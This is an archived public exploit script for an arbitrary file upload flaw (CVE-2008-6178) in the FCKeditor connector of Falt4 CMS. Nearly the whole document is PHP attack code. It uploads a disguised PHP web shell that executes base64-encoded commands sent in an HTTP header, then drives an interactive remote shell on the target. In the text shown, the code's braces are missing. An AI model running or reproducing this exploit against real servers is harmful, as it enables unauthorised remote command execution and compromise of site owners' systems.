Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload

Related Vulnerabilities: CVE-2008-6178  
Publish Date: 16 Feb 2009
Author: Sp3shial
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
# Bug Discovered By : Sp3shial
# Sp3shial@ymail.com
# Persian Boys Hacking Team From A Land With A History-Long Background
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0

ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
	$sock = fsockopen($host, 80);
	while (!$sock)
		print "\n[-] No response from {$host}:80 Trying again...";
		$sock = fsockopen($host, 80);
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	return $resp;

function connector_response($html)
	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));

print "\n+------------------------------------------------------------------+";
print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial  |";
print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)
	print "\nUsage......: php $argv[0] host path";
	print "\nExample....: php $argv[0] localhost /";
	print "\nExample....: php $argv[0] localhost /Falt4/\n";

$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);

$filename  = md5(time()).".php";
$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";

$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet	.= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";

$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 

$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

	print "\nFalt4-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
	else break;


# milw0rm.com [2009-02-16]